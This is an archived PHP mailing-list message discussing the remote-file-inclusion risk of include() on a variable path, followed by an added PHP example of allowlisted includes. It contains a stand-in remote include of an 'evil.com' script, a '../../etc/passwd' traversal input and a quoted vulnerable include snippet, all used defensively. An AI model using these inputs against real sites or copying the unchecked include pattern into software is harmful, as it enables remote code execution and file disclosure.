[nycphp-talk] parse file, return as string
David Mintz
dmintz at davidmintz.org
Thu Aug 19 12:07:05 EDT 2004
On Thu, 19 Aug 2004, inforequest wrote:
> Fan, Wellington wfan-at-VillageVoice.com |nyphp 04/2004| wrote:
>
> >ob_start();
> >@include($path_to_file);
> >$contents = ob_get_clean();
> >
> >
> be very wary of remote injections with that code.... include will accept
> a URL in that variable. Explicitly allow $path_to_file (is it expected
> to always be on *your* domain?).
>
If you have allow_url_fopen disabled, include('http://evil.com/evil.php')
will fail, right?
---
David Mintz
http://davidmintz.org/
"Anybody else got a problem with Webistics?" -- Sopranos 24:17
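
An added example, not code from the thread or its participants: the explicit allowlisting suggested in the quoted reply, applied to the ob_start()/include snippet. The function name render_file(), the demo directory and the allowlist entries are hypothetical; the check does not depend on the allow_url_fopen setting.

```php
<?php
// Added example; render_file(), the demo directory and the allowlist are hypothetical.

/**
 * Include a file chosen from a fixed allowlist and return its output as a string.
 */
function render_file(string $name, string $baseDir, array $allowed): string
{
    // 1. Exact match against the allowlist: URLs, absolute paths and "../"
    //    sequences never match, whatever the php.ini URL settings are.
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("File not allowed: $name");
    }

    // 2. Resolve symlinks and confirm the target still lives under the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("File missing or outside base directory: $name");
    }

    // 3. Buffer the output as in the quoted snippet, but without "@",
    //    so include errors are not silently discarded.
    ob_start();
    try {
        include $path;
        return (string) ob_get_clean();
    } catch (Throwable $e) {
        ob_end_clean();
        throw $e;
    }
}

// Constructed demo input: one small template in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo';
is_dir($dir) || mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'header.php', 'Hello <?php echo 1 + 1; ?>');
$allowed = ['header.php', 'footer.php'];

echo render_file('header.php', $dir, $allowed), "\n";

// Constructed untrusted values: both are rejected before include is reached.
foreach (['http://example.com/x.php', '../../etc/passwd'] as $bad) {
    try {
        render_file($bad, $dir, $allowed);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```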